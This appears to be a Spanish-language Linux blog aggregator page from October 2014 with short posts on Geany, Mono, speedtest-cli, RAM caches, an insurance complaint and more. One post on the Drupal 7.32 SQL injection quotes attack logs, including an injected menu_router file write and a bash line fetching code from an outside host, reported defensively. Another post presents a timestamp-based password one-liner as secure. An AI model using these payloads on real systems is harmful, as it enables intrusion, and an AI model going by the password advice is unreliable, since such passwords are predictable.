Viernes 24 de octubre de 2014

Antonio de Dios

Antonio de Dios
Webadedios » Linux

[fix] geany no inicia, “Attempt to unlock mutex that was not locked”

Hice una actualización, y después de unos días feliz intento abrir el editor geany y cual es mi sorpresa de toparme con el mensaje


toto@linux:~$ geany
Attempt to unlock mutex that was not locked
Abortado

Y pues efectivamente no abría, abortaba el inicio del programa.

corro entonces geany, dándole la instrucción geany -v, para leer el mensaje de donde podría estar el error, y veo que se detiene al momento de invocar los plugins


toto@sidux:~$ geany -v
Geany-INFO: Geany 1.24.1, es_MX.UTF-8
Geany-INFO: GTK 2.24.25, GLib 2.42.0
Geany-INFO: System data dir: /usr/share/geany
Geany-INFO: User config dir: /home/toto/.config/geany
Geany-INFO: System plugin path: /usr/lib/i386-linux-gnu/geany
Geany-INFO: Added filetype Go (58).
Geany-INFO: Added filetype Clojure (59).
Geany-INFO: Added filetype Genie (60).
Geany-INFO: Added filetype Scala (61).
Geany-INFO: Added filetype Cython (62).
Geany-INFO: Added filetype CUDA (63).
Geany-INFO: Added filetype Graphviz (64).
Geany-INFO: Loaded: /usr/lib/i386-linux-gnu/geany/autoclose.so (Autocierre)
Geany-INFO: Loaded: /usr/lib/i386-linux-gnu/geany/addons.so (Añadidos)
Geany-INFO: Loaded: /usr/lib/i386-linux-gnu/geany/defineformat.so (Definir formateador)
Attempt to unlock mutex that was not locked
Abortado

hago una prueba de llamar a geany, sin plugins, con la instrucción geany -p y abre perfectamente

toto@sidux:~$ geany -p

por lo que voy a ver (editar) el archivo ~/.config/geany/geany.conf para ver cuales plugins están activos y cual es él que esta dando problemas.

Solución

Después de probar quitando uno por uno, veo que es debugger.so el que da problemas, por lo cual borro de la lista, guardo, inicio geany y todo funciona bien nuevamente

la linea editada en la sección plugins, listado en active_plugins= quedo así después de borrar /usr/lib/i386-linux-gnu/geany/debugger.so; (efectivamente, tengo activados muchos plugins)


[plugins]
load_plugins=true
custom_plugin_path=
active_plugins=/usr/lib/i386-linux-gnu/geany/autoclose.so;/usr/lib/i386-linux-gnu/geany/addons.so;/usr/lib/i386-linux-gnu/geany/defineformat.so;/usr/lib/i386-linux-gnu/geany/geanypy.so;/usr/li
b/i386-linux-gnu/geany/geanymacro.so;/usr/lib/i386-linux-gnu/geany/multiterm.so;/usr/lib/i386-linux-gnu/geany/filebrowser.so;

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

Mono for Unreal Engine

Earlier this year, both Epic Games and CryTech made their Unreal Engine and CryEngine available under an affordable subscription model. These are both very sophisticated game engines that power some high end and popular games.

We had previously helped Unity bring Mono as the scripting language used in their engine and we now had a chance to do this over again.

Today I am happy to introduce Mono for Unreal Engine.

This is a project that allows Unreal Engine users to build their game code in C# or F#.

Take a look at this video for a quick overview of what we did:

This is a taste of what you get out of the box:

  • Create game projects purely in C#
  • Add C# to an existing project that uses C++ or Blueprints.
  • Access any API surfaced by Blueprint to C++, and easily surface C# classes to Blueprint.
  • Quick iteration: we fully support UnrealEngine's hot reloading, with the added twist that we support it from C#. This means that you hit "Build" in your IDE and the code is automatically reloaded into the editor (with live updates!)
  • Complete support for the .NET 4.5/Mobile Profile API. This means, all the APIs you love are available for you to use.
  • Async-based programming: we have added special game schedulers that allow you to use C# async naturally in any of your game logic. Beautiful and transparent.
  • Comprehensive API coverage of the Unreal Engine Blueprint API.

This is not a supported product by Xamarin. It is currently delivered as a source code package with patches that must be applied to a precise version of Unreal Engine before you can use it. If you want to use higher versions, or lower versions, you will likely need to adjust the patches on your own.

We have set up a mailing list that you can use to join the conversation about this project.

Visit the site for Mono for Unreal Engine to learn more.

(I no longer have time to manage comments on the blog, please use the mailing list to discuss).

Jueves 23 de octubre de 2014

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

Listadmin — *YES*

Petter posted yesterday about Listadmin, the quick way to moderate mailman lists.

Petter: THANKS.

I am a fan of automatization. But, yes, I had never thouguht of doing this. Why? Don't know. But this is way easier than using the Web interface for Mailman:

$ listadmin 
fetching data for conoc_des@my.example.org ... nothing in queue
fetching data for des_polit_pub@my.example.org ... nothing in queue
fetching data for econ_apl@my.example.org ... nothing in queue
fetching data for educ_ciencia_tec@my.example.org ... nothing in queue
fetching data for est_hacend_sec_pub@my.example.org ... 

[1/1] ============== est_hacend_sec_pub@my.example.org ======
From:     sender@example.org                                            
Subject:  Invitación al Taller Insumo Producto                          
Reason:   El cuerpo del mensaje es demasiado grande: 777499    Spam? 0  
Approve/Reject/Discard/Skip/view Body/Full/jump #/Undo/Help/Quit ? a
Submit changes? [yes] 

fetching data for fiscal_fin@my.example.org ... nothing in queue
fetching data for historia@my.example.org ... nothing in queue
fetching data for industrial@my.example.org ... nothing in queue
fetching data for medio_amb@my.example.org ... nothing in queue
fetching data for mundial@my.example.org ... nothing in queue
fetching data for pol_des@my.example.org ... nothing in queue
fetching data for sec_ener@my.example.org ... nothing in queue
fetching data for sec_prim@my.example.org ... nothing in queue
fetching data for trab_tec@my.example.org ... nothing in queue
fetching data for urb_reg@my.example.org ... nothing in queue
fetching data for global@my.example.org ... nothing in queue

I don't know how in many years of managing several mailing lists I never thought about this! I'm echoing this, as I know several of my readers run mailman as well, and might not be following Planet Debian.

Martes 21 de octubre de 2014

Julio Mayorga

Julio Mayorga
Blog 123Hosting.com.mx

Verificar la velocidad de internet con Speedtest

Usualmente cuando la conexión a internet se torna lenta, se suele recurrir a medidores de velocidad para verificar dicha velocidad, uno de los mas usados actualmente es el servicio Speedtest, pero a través de este tutorial, les diré como medir la velocidad de internet usando los servicios de Speedtest haciéndolo mediante la terminal de Linux.

El servicio Speedtest funciona de la siguiente manera: se carga un código javascript en el navegador el cuál automáticamente detecta el servidor mas cercano desde donde se realizará la prueba de velocidad y envía estos datos a Speedtest, este, automáticamente realiza acciones de subidas y descargas enviando peticiones HTTP GET y POST a dicho servidor.

Speedtest requiere del plugin Adobe Flash Player para poder realizar la prueba de velocidad, si bien, la mayoría de los usuarios disponen de flash player en sus navegadores, esto resulta muy incomodo para aquellos que no dispongan de interfaz gráfica de usuario (GUI), administradores de servidores remotos, VPS o simplemente usuarios que no usan FlashPlayer por motivos personales.

Pues bien, actualmente existe ya una aplicación llamada speedtest-cli, el cuál, es un sencillo cliente CLI y escrito en Phyton el cuál mide el ancho de banda de manera bi-direccional usando la infraestructura de SpeedTest, vale reseñar que este cliente funciona tanto en las versiones 2.4 como en la 3.4 de Phyton.

Para realizar la instalación y comenzar a usar speedtest-cli debemos realizar los siguientes pasos vía terminal:

descargamos e instalamos la aplicación

sudo wget https://raw.github.com/sivel/speedtest-cli/master/speedtest_cli.py -O /usr/bin/speedtest-cli
sudo chmod +x /usr/bin/speedtest-cli

Esto automáticamente nos localizará el servidor mas cercano de Speedtest y realizará las funciones de subida/descarga.

Linux
Si deseamos obtener una imágenes para luego compartirla en la web, simplemente añadimos la opción –share despues del comando speedtest-cli.

test
Si deseamos obtener resultados de un servidor distinto, debemos seleccionarlo manualmente, para ello agregamos la opción –list después del comando speedtest-cli (esto nos mostrara varios servidores ubicados geográficamente)

Test de Velocidad de Internet desde Consola [2 maneras] Vale destacar que estos servidores tienen un ID, por lo cuál, una vez que hallemos el servidor deseado, simplemente colocamos la opción –server seguido del ID del servidor seleccionado después del comando speedtest-cli

terminal

Julio Mayorga

Julio Mayorga
Blog 123Hosting.com.mx

Geolocalizar IPs desde la consola

Primero que nada vamos a necesitar instalado lynx, un navegador en modo texto y luego, crear un archivo de esta forma:

nano /usr/bin/geoip

Con el siguiente contenido

#!/bin/sh
lynx -useragent=”Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0″ -dump “http://www.geoiptool.com/?ip=$1″ | sed -n ‘/Hostname/,/Latitude/p’

Salvan con ctrl+o, enter y salen con ctrl+x

Luego de eso: sudo chmod +x /usr/bin/geoip

Listo, aca una muestra de como queda:

Geo Localizar IP desde terminal Linux

Julio Mayorga

Julio Mayorga
Blog 123Hosting.com.mx

Limpiar memoria RAM por comandos

A diferencia de Windows, donde se debe recurrir a programas para limpiar la RAM, es decir, luego de, 1 dia de un Windows iniciado, notamos que por mas que cerremos todo, la RAM no esta como iniciamos, sino un poco mas abultada.
Generalmente esos programas rompen cosas y provocan perdida de datos, o no funcionan, pero en Linux, si, y excelentemente. Además, no es un programa!, sino una funcion de kernel Linux.

Por defecto, la cache de RAM, la maneja el kernel, y no es necesario tocarla, pero si sos muy obsesivo y paranoico, como yo, te gustará ver la RAM, identica a como iniciaste el sistema, aun despues de haber tenido la PC prendida 1 dia o mas.

A partir del kernel 2.6.16 se introdujo esta caracteristica de la que hablaremos ahora.

La caché RAM, son “cosas” que quedan ahi, por si se necesitan luego, ejemplos de programas que generan que esto se “llene” son:

Chrome
Firefox
VirtualBox
Pidgin
Gimp
Apache

En el directorio /proc/sys/vm/ tenemos un fichero llamado drop_caches, que se encarga de decirle al kernel Linux que hacer con las caches RAM.

A veces, no solo es util en tu PC, sino en servidores, en ocasiones, el uso de java en Apache, consultas, etc, genera que la RAM se llene y no se vacie, si tenemos un pequeño server de 512 de RAM o menos, esto, nos va a salvar tener que reiniciar algun servicio o el server.

Primero que nada, voy a explicar los valores existentes y su definicion.

0: No libera nada, lo controla el kernel (asi viene por defecto al iniciar el sistema)
1: Libera la pagecache
2: Libera inodos y dentries
3: Libera inodos, pagecache y dentries (todo en uno)

Definicion:

pagecache: Memoria caché de la paginación.

dentries: (Directory Entries) Representa la relación de forma estructurada que existe entre directorios-archivos.

inodes: Son nodos índice de archivos y directorios que usa el Sistema de Archivos para administrar las actividades posibles de dichos archivos y directorios guardados en disco o memoria. Contiene la metadata de los archivos y directorios: permisos, tamaño, propietario, última fecha de acceso, creación, modificación, etc.

Ahora bien, hay dos formas de hacer esto, mediante sysctl o mediante un simple echo, la forma politicamente correcta, seria sysctl, la corta y facil, igual de efectiva y no dañina, es echo.

Antes de hacer esto, se recomienda usar el comando sync, para los que no saben, man sync, pero basicamente vuelca al disco todos los cambios que andan rondando en RAM, dado que Linux es un sistema asincrono, en lo que discos respecta, a menos que montemos las particiones de forma sincronica en /etc/fstab, cosa que reduce el rendimiento, sobre todo en Ext4.

Nos logueamos como root y hacemos:

#sync
#echo “0″ > /proc/sys/vm/drop_caches
#sync
#echo “1″ > /proc/sys/vm/drop_caches
#sync
#echo “2″ > /proc/sys/vm/drop_caches
#sync
#echo “3″ > /proc/sys/vm/drop_caches

Si leyeron bien, se habrán dado cuenta, que con la 3 hacemos todo, ok?.
La forma correcta, es con:

#sync
#sysctl vm.drop_caches=3

Ahora, si quieren, antes de seguir, hagan la prueba, inicien su PC, miren en htop la RAM consumida y anoten el valor, luego, abran Chrome, Firefox, miren un video en youtube, etc. Cierren todo y miren la RAM, veran un incremento. Ahora, abran un terminal, como root pongan:

#sync
#echo “3″ > /proc/sys/vm/drop_caches

Vuelvan a mirar la RAM en htop, cambio no?.

Ahora, simplifiquemos esto, como?, un script, ponerlo en .bashrc me parece un exceso, ademas deberiamos abrir una terminal, lo mismo si lo ponemos en cron, es un exceso, asi que, creamos un script, de la siguiente forma.

Se loguean como root y:

nano /usr/local/bin/freeram (asi le pongo yo, ustedes le ponen como quieren, pepe, luis, liberaram)

y el contenido será:

#!/bin/sh
# Author: SynFLag
# Licence: GNU GPLv3
# Freeram is a script to clean the RAM caches
sync ; echo 3 > /proc/sys/vm/drop_caches ; echo “RAM Liberada”

exit 0

Salvan con ctrl+o y salen con crtl+x, luego, como root nuevamente:

chmod +x /usr/local/bin/freeram

Ahora, desde cualquier terminal, ponen:

$ sudo freeram (dado que necesita permisos de root), y listo, liberan la ram cuando desean o para los que no usan sudo, como yo
$ su -c “freeram”

Esto aplica a cualquier distro Linux con kernel 2.6.16 o superior

Lunes 20 de octubre de 2014

Oswaldo Villa

Oswaldo Villa
Villatux Blog <--

Generar contraseñas random

Cuando generas muchas cuentas de usuario, es muy engorroso ponerle una contraseña a cada uno y asegurarte de que sea segura.


Con este comando puedes generar contraseñas tan seguras como gustes de manera random,  el cual puedes utilizar en tus scripts de creación de usuarios:


date +%s | md5sum | base64|  head -c 8 ; echo

Descripción:

date +%s  :  nos muestra la fecha en formato timestamp indicando los segundos
md5sum : encripta la salida anterior en md5
base64 :  encripta la salida anterior en base64
head -c 8: muestra solo los primeros 8 caracteres

Domingo 19 de octubre de 2014

Itzcoalt Alvarez Moreno

Itzcoalt Alvarez Moreno
Itzcoalt (itz) Álvarez

Seguros

Hace mas de un mes tuve un problema con el auto, por lo que la persona que daño mi vehículo llamo a su seguro a fin de responsabilizarse por los daños.

Debido al modelo de mi auto, seleccione que fuera atendido por la Agencia Nissan Fuji Automotriz, en donde fue recibido y empezo el proceso de reparacón.

Casi un mes después, paso a recoger mi vehículo y observo que vibra y que uno de los soportes del motor esta ROTO, lo reporto a la agencia, ellos a su vez al taller quien me dice que debo hablar directamente con la aseguradora.

Y en este momento, inician los problemas.

Para empezar, mi primera llamada no fue registrada en su sistema, y tuve que llamar 3 días después, el supervisor de calidad, me dice que el golpe fue de lado izquierdo, y que el soporte del motor esta del lado derecho por lo que no procede la reclamación, sin embargo, me indica que pasará su reporte y que contactaran al ajustador para validar con el la informacion.

 

Después de otras 4 días vuelvo a llamar, y el departamento de calidad de la aseguradora no desea tomarme la llamada, me canaliza nuevamente con el supervisor asignado a la agencia, y me indica que  ha recibido un correo en donde le indican que no procede, le pido copia del mismo, y se niega a proporcionarla.

Interesante que un departamento de calidad tenga problemas en la calidad del servicio que deben supervisar.

Es un hecho que antes del accidente el soporte del motor no estaba roto, sin embargo, la aseguradora no se hizo responsable, el ajustador incluyo en la orden de admisión la leyenda “mecánica a consecuencia“, sin embargo, ni la agencia, ni el seguro verificaron  que se le realizaran las pruebas necesarias al auto, a tal grado, que la propia agencia estaba entregándome el auto sin avisar del soporte roto, y la ¿calidad?, acaso, si no esta roto no implica que este “afectado”. donde queda la responsabilidad de la aseguradora y la agencia en estos casos.

Es preocupante que ninguna de las dos empresas se preocupen por el afectado y por la calidad de sus servicios.

Recomendaciones para casos similares.

1.- Tomen fotos de todos los ángulos del golpe, y de todo el motor.

2.- Valide o haga validar las fotos con el ajustador,  una forma fácil es tomar algunas con el de fondo :)

3.- El seguro y la Agencia no les importa lo que pase con tu auto y no te informaran del avance, llama,llama,llama, y si te es posible acude

4.- El seguro y la agencia solo se responsabilizan con lo que dice la orden de admisión y por ende, lo que dice el ajustador que esta roto, así que asegurarte te pongan todo, y apoyarte en las fotos en caso de problemas

5.- PROFECO es una opción,  sin embargo, esto llevara tiempo.

6.- Consideran la no contratación de aseguradoras que tienen este tipo de vicios en su organizacion.

 

Para el registro.

 

Aseguradora QUALITAS

Agencia: Fuji Automotriz.

 

 

Actualización.

Molesto por la atención recibida, pedí me indicaran el proceso para levantar una queja, me canalizaron al envío de un correo a la cuenta ccq@qualitas.com.mx.

 

El día 15 de Octubre envie el siguiente correo, y debo decir que hasta el día de hoy (18 de octubre) , no he recibido comunicación alguna por parte de la aseguradora, no hay correo de confirmación de recepción, no hay comunicación de un gerente, o en su caso de un departamento encargado de la atención al cliente, por lo que podemos decir, que es un buzon, que se va directo a  /dev/null

—- Correo —-

Numero de Reporte: 737617
Automovil: Sentra 2007.
Por medio del presente me dirigo a quien corresponda con el fin de levantar una queja en base a su servicio, y procedimiento de seguimiento hacia sus clientes.
Narrativa de hechos:

Soy el 3ero perjudicado dentro de un accidente ocurrido el dia 9 de Septiembre, quien golpeo mi auto tenia asegurada su unidad con ustedes.
El trato de su ajustador fue correcto, y fui canalizado a Fuji Automotriz. en donde el auto fue recibido y se procedio a la preparacion.

Anomalias:

Al recoger el auto, me percado que este VIBRA cuando esta encendido, procedo a revisar el motivo de esta vibracion y observo el soporte del motor Roto del lado opuesto a donde fue el golpe, la agencia me remite al taller automotriz, en donde en ninguna de las fotos que observamos se pude detemrinar el estado del soporte al momento de la recepcion del mismo y me indica que no esta cubierto este daño, que debo levantar una queja con Calidad de Quialitas.

Procedo a hacer esta llamada el dia 7de Octubre, en donde se me indica que lo canalizaran con el supervisor de Calidad, y que me llamaran, espero hasta el dia 10 de octubre sin respuesta alguna y decido llamar, y solo me entero que mi reporte anterior no fue levantado y que de acuerdo a la Base de datos de seguimiento no se reporto mi llamada, molesto les pido me auxilien por que tengo ya una SEMANA mas sin mi auto.

Atienden la llamada y ese mismo dia el supervidor de Calidad me llama para indicarme que de acuerdo a sus observaciones no procede el pago del soporte dañano. aun cuando comente que dicho daño no estaba antes del accidente, mis argumentos son desechados sin mayor afan que la de no cubrir el costo, toda que vez que aun que el no estubo en accidente, carece de la informacion del propio dueño y conductor del auto., el mismo supervisor me indica que el pasara su reporte a QUALITAS y que contactaran al Ajustador para verificar lo procedente, que Quialitas me llamará.

Pasan 3 dias y Quialitas no me llama, decido hacer la llamada personalmente para que me comuniquen con CALIDAD, y el area de calidad simplemente no me quiere tomar la llamada arguementando que el caso esta cerrado.

Punto importante, CERRADO si nunca Qualitas me llamo para darme esta informacion y quedamos en la espera de la informacion del Ajustador.

Quien me atiente, una recepcionista, tal vez sin el entrenamiento adecuado para las labores especifica del area de CALIDAD, me comunican nuevamente con el supervisor de CALIDAD asignado a la Agancia Fuji Automitriz, quien me informa que el dia de ayer recibio un correo en donde indican TEXTUALMENTE que no procede mi reclamacion, le pido me reenvie el correo, y me indica que no puede hacerlo.
QUEJA.

Cual es el seguimiento que dan a sus reportes, que ustedes como OFICINA CENTRAL no se comunicaron en ningun MOMENTO con un servidor para dar seguimiento a mi queja, en todo momento yo como cliente he tenido que hacer las llamadas para ver el seguimiento a una REPORTE de su area de CALIDAD.

Por que CALIDAD no desea contestar mi llamada argumentando que esta CERRADO el reporte y sin informarme el resultado del mismo, cual es el procedimiento para una queja de la CALIDAD del servicio que de su departamento de CALIDAD?

Por que la Agencia no reviso el auto antes de entregarlo y peor aun, por que la agencia no valido que la entrega de la unidas se haya realizado acorde a un protocolo.?, mas si dentro de la orden de admision se estipulo “MECANICA a CONSECUENCIA”, si la afectacion fuera en un soporte de la suspencion o en alguna otra parte que quedará dañada producto del accidente, este daño no seria identificado de manera VISUAL, luego entoces… hasta donde llega la responsabilidad en la reparacion de una unidad que ingreso con esa nota “MECANICA a CONSECUENCIA”

¿Que Pruebas se realizaron a la unidad para descartar otros daños? fuera de los observador VISUALMENTE por el ajustador?
En cuanto al hecho de no querer pagar el daño del soporte al motor, me parece un error, toda vez, que como dueño de la unidad les afirmo, el daño no estaba antes del Accidente, por que no me mostraron las fotos que tomo el ajustador y que integran el expediente?

Quedo en espera de sus comentarios y de acciones.

Atentamente.

Izcoalt Alvarez Moreno.

—- Correo —-

 

Sábado 18 de octubre de 2014

Ocurrencias

Iba a escribir que citas citables, pero el único que me ha citado soy yo, en este mensaje, como ya tengo varios posts que son un montón de citas celebres, me puse a pensar en algunas mías, que no suenan tan mal que he dicho, que repito por ahí y pues que mejor lugar que aquí para ponerlas.

“Es mejor si podemos ayudar a unos pocos, que si solo nos quedamos lamentándonos de no poder ayudar a todos”

“Es mejor si hacemos algo por unos cuantos, que si nos lamentamos de no hacer nada para todos”

“Si no citan, se les ocurrió a ustedes, son muy listos o fue iluminación divina o están cometiendo plagio, como es poco probable que se les haya ocurrido, y todavía no son tan listos…  mejor citen”

“Por supuesto que ocurrió un problema al enviar correo, el servidor de correo, no está instalado en la máquina, no se puede enviar correo”

“Practicar una exposición, es útil, grabarse es todavía mejor, no sabemos cómo nos movemos cuando exponemos o que expresiones usamos o nuestras muletillas, a esta altura del curso ya han de identificar las que más uso […] pero la ventaja de saberlas es no quedarse atorado y no ponerse nervioso de descubrirse usándolas”

“¿Se han preguntado por qué es así?”

“Seguro esto ya lo saben, pero de todas formas es algo que vale la pena volver a tratar…”

“Esto debieron de haberlo visto en […] pero en caso de que no lo tengan tan presente vamos a recordarlo”

“Seguro cuando estudiaron les enseñaron esto y han hecho lo posible por olvidarlo, ya que quien se los enseño lo hizo de la manera más aburrida, complicada y tediosa…”

“Existen muchos consejos para estar tranquilo (antes de exponer), a algunos les funciona caminar, a otros tomar agua, a unos más meditar, sin embargo todos somos distintos por cada consejo habrá alguien a quien eso lo pone nervioso, el único que podemos dar para todos es preparar bien la exposición y estar seguros de que lo que tenemos que decir es importante, que si nos equivocamos no se va acabar el mundo y si sale bien, lo podemos volver a hacer”

“¿No hay ninguna pregunta?, ¿todo quedo claro?, ‘tan claro como el petróleo?”

“No hay preguntas tontas, hay tontos que no preguntan”

Viernes 17 de octubre de 2014

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

#Drupal7 sites under attack — Don't panic!

Two days ago, Drupal announced version 7.32 was available. This version fixes a particularly nasty bug, allowing a SQL injection at any stage of interaction (that means, previous to the authentication taking place).

As soon as I could, I prepared and uploaded Debian packages for this — So if you run a Debian-provided Drupal installation, update now. The updated versions are:

sid / jessie (unstable / testing)
7.32-1
wheezy (stable)
7.14-2+deb7u7
wheezy-backports
7.32-1~bpo70+1
squeeze-backports (oldstable)
7.14-2+deb7u7~bpo60+1

And, as expected, I'm already getting several attacks on my sites. Good thing that will help you anyway: Even though it won't prevent the attack from happening, if you use suhosin, several of the attacks will be prevented. Yes, sadly suhosin has not been in a stable Debian release since Wheezy, but still... :-|

Partial logs. This looks like a shellcode being injected as a file created via the menu_router mechanism (shellcode snipped):

  1. Oct 16 15:22:21 lafa suhosin[3723]: ALERT - configured request variable
  2. total name length limit exceeded - dropped variable 'name[0; INSERT INTO
  3. `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`,
  4. `access_callback`, `access_arguments`) VALUES ('deheky', '', '', 'deheky',
  5. 'file_put_contents',
  6. +0x613a323a7b693a303b733a32323a226d6f64756c65732f64626c6f672f746e777(...)
  7. );;# ]' (attacker '62.76.191.119', file '/usr/share/drupal7/index.php')

While the previous one is clearly targetting this particular bug, I'm not sure about this next one: It is just checking for some injection viability before telling me its real intentions:

  1. Oct 17 10:26:04 lafa suhosin[3644]: ALERT - configured request variable
  2. name length limit exceeded - dropped variable
  3. '/bin/bash_-c_"php_-r_\"file_get_contents(
  4. 'http://hello_hacked_jp/hello/?l'
  5. (attacker '77.79.40.195', file '/usr/share/drupal7/index.php')

So... looking at my logs from the last two days, Suhosin has not let any such attack reach Drupal (or I have been h4x0red and the logs have all been cleaned — Cannot dismiss that possibility :-) )

Anyway... We shall see many such attempts in the next weeks :-|

[update] Yes, I'm not the only one reporting this attack in the wild. Zion Security explains the same attempt I logged: It attempts to inject PHP code so it can be easily executed remotely (and game over for the admin!)

For the more curious, Tamer Zoubi explains the nature and exploitation of this bug.

Martes 14 de octubre de 2014

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

OpenStackGDL October 2014

Registrate


César Yáñez Fernández

Lista de Donación de Libros

En el área de cómputo, al igual que en otras áreas y ciencias, existe mucha literatura, libros de texto, manuales, documentos, artículos, etcétera. Uno cuando empieza a recabar esta información, llega el momento que necesitas espacio.

Un libro es como un ser vivo, que necesita ser adoptado para que siga cumpliendo su función, para que se mantenga vivo. Es por esto que me doy a la tarea de crear una lista de libros que se encuentran disponibles para adoptar.

Si alguien quiere uno de los libros listados, se sugiere cumplir las siguientes condiciones:

  1. El libro no está en venta, ni tiene un precio definido.
  2. El libro es donado, sin un costo por el libro.
  3. Para pedir un libro, me pueden contactar personalmente.
  4. El libro será enviado por Correos de México.
  5. Si el solicitante prefiere otro método de envío (DHL, UPS), el solicitante deberá pagar por el envío.
  6. Si se solicita más de 1 libro, el paquete será enviado por DHL, y el solicitante deberá pagar por el envío.

La lista de libros aún no está completa, y no sólo habrá libros de cómputo, esta lista se irá actualizando con más libros y se eliminarán los que ya fueron adoptados.

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

.NET Foundation: Forums and Advisory Council

Today, I want to share some news from the .NET Foundation.

Forums: We are launching the official .NET Foundation forums to engage with the larger .NET community and to start the flow of ideas on the future of .NET, the community of users of .NET, and the community of contributors to the .NET ecosystem.

Please join us at forums.dotnetfoundation.org. We are using the powerful Discourse platform. Come join us!

Advisory Council: We want to make the .NET Foundation open and transparent. To achieve that goal, we decided to create an advisory council. But we need your help in shaping the advisory council: its role, its reach, its obligations and its influence on the foundation itself.

To bootstrap the discussion, we have a baseline proposal that was contributed by Shaun Walker. We want to invite the larger .NET community to a conversation about this proposal and help us shape the advisory council.

Check out the Call for Public Comments which has a link to the baseline proposal and come join the discussion at the .NET Forums.

Gunnar Wolf

Gunnar Wolf
Gunnar Wolf

When Open Access meets the Napster anniversary

Two causally unrelated events which fit in together in the greater scheme of things ;-)

In some areas, the world is better aligning to what we have been seeking for many years. In some, of course, it is not.

In this case, today I found our article on the Network of Digital Repositories for our University, in the Revista Digital Universitaria [en línea] was published. We were invited to prepare an article on this topic because this month's magazine would be devoted to Open Access in Mexico and Latin America — This, because a law was recently passed that makes conditions much more interesting for the nonrestricted publication of academic research. Of course, there is still a long way to go, but this clearly is a step in the right direction.

On the other hand, after a long time of not looking in that direction (even though it's a lovely magazine), I found that this edition of FirstMonday takes as its main topic Napster, 15 years on: Rethinking digital music distribution.

I know that nonrestricted academic publishing via open access and nonauthorized music sharing via Napster are two very different topics. However, there is a continuous push and trend towards considering and accepting open licensing terms, and they are both points in the same struggle. An interesting data point to add is that, although many different free licenses have existed over time, Creative Commons (which gave a lot of visibility and made the discussion within the reach of many content creators) was created in 2001 — 13 years ago today, two years after Napster. And, yes, there are no absolute coincidences.

Planeta Laguna: Problemas con la tarjeta Nvidia al actualizar Manjaro

Lunes 13 de octubre de 2014

Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

Leyes fundamentales de la estupidez humana (Carlo M Cipolla)

Esto es algo que me llamó la atención, gracias a Omar Lara que me lo compartió
es un tratado formal sobre la estupidez humana, el artículo completo aquí


Introducción

"La humanidad se encuentra (y sobre esto el acuerdo es unánime) en un estado deplorable. Ahora bien, no se trata de ninguna novedad. Si uno se atreve a mirar hacia atrás, se da cuenta de que siempre ha estado en una situación deplorable. El pesado fardo de desdichas y miserias que los seres humanos deben soportar, ya sea como individuos o como miembros de la sociedad organizada, es básicamente el resultado del modo extremadamente improbable (y me atrevería a decir estúpido) como fue organizada la vida desde sus comienzos. 
Desde Darwin sabemos que compartimos nuestro origen con las otras especies del reino animal, y todas las especies -ya se sabe- desde el gusanillo al elefante tienen que soportar sus dosis cotidianas de tribulaciones, temores, frustraciones, penas y adversidades. Los seres humanos, sin embargo, poseen el privilegio de tener que cargar con un peso añadido, una dosis extra de tribulaciones cotidianas provocadas por un grupo de personas que pertenecen al propio género humano. Este grupo es mucho más poderoso que la Mafia, o que el complejo industrial-militar o que la Internacional Comunista. Se trata de un grupo no organizado, que no se rige por ninguna ley, que no tiene jefe, ni presidente, ni estatuto, pero que consigue, no obstante, estar en perfecta sintonía, como si estuviese guiado por una mano invisible, de tal modo que las actividades de cada uno de sus miembros contribuyen poderosamente a reforzar y ampliar la eficacia de la actividad de todos los demás miembros. La naturaleza, el carácter y el comportamiento de los miembros de este grupo constituyen el tema de las páginas que siguen. 
Es preciso subrayar a este respecto que este ensayo no es ni producto del cinismo ni un ejercicio de derrotismo social -no más de cuanto pueda serlo un libro de microbiología-. Las páginas que siguen son, de hecho, el resultado de un esfuerzo constructivo por investigar, conocer y, por lo tanto, posiblemente neutralizar, una de las más poderosas y oscuras fuerzas que impiden el crecimiento del bienestar y de la felicidad humana. "



1. Siempre e inevitablemente cada uno de nosotros subestima el número de individuos 
  estúpidos que circulan por el mundo

2. La probabilidad de que una persona determinada sea una estúpida es independiente 
  de cualquier otra característica de la misma persona

3. Una persona estúpida es una persona que causa un daño a otra persona o grupo de 
  personas sin obtener, al mismo tiempo, un provecho para sí, o incluso obteniendo un 
  perjuicio. 

4. Las personas no estúpidas subestiman siempre el potencial nocivo de las personas 
  estúpidas. Los no estúpidos, en especial, olvidan constantemente que en cualquier 
  momento y lugar, y en cualquier circunstancia, tratar y/o asociarse con individuos 
  estúpidos se manifiesta infaliblemente como costosísimo error. 


Carlo M Cipolla

Emerson Posadas

Emerson Posadas
toxickore BLOG

¿Qué pasó después de 99 days of freedom?

Después de 99 días de "libertad" puedo decir lo siguiente:

  • No pude completar el reto
  • Mi círculo social y familiar es altamente dependiente de facebook
  • Si no estás en facebook, no te avisan de muchos eventos sociales de esos círculos familiares/sociales
  • Reviso la red social cada 3-7 días, a veces me entero de chats muchos días después
  • Vives tu realidad al estar alejado de la red social
  • Dejas de fantasear/competir/presumir/pelear/intoxicar/desperdiciar
  • Aprovechas mejor tu tiempo libre
  • Al ver a tus amigos o conocidos en persona, te interesa X 2 hablar con ellos de lo que han hecho
  • Distingues las amistades/familiares cercanas(os) de las amistades(familiares) virtuales, quién está cerca y quién no está.
Post data:
También puedes filtrar todo el contenido de las personas para dejar solo lo que te interese, de modo que no te requemes todas esas telenovelas o contenido que de poco sirve.
Alcance Libre: Curso Global de Servidores con CentOS 6.
Planeta Laguna: PoC Shell Sock Reverse Shell cgi-bin

Domingo 12 de octubre de 2014

Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

Otro post más de política (yapp)

Sobre la agresión física a Cárdenas y los ideales inocentes anarquistas
Y pseudo humanistas de libertad de la nueva juventud izquierdista mexicana (o sea yo y muchos más)

Para mí que sí los pateen que se de cuenta la “izquierda“ que tampoco los queremos y que decepcionaron a la clase baja con sus ambiciones derechistas y la misma sed de poder de siempre.

Violencia... Sí, ya es hora de los madrazos,país con 60 millones de paupérrimos... Y Todos somos luchadores sociales en twitter y facebook... Y nos indignamos por unas patadas a otro power-retarded.

No violencia? Ok como a los normalistas... Iguala...

Vivimos con un concepto de libertad y paz muy inocente... Y un tanto estúpido porque no resuelve nada... Te mantiene constante y en 0.

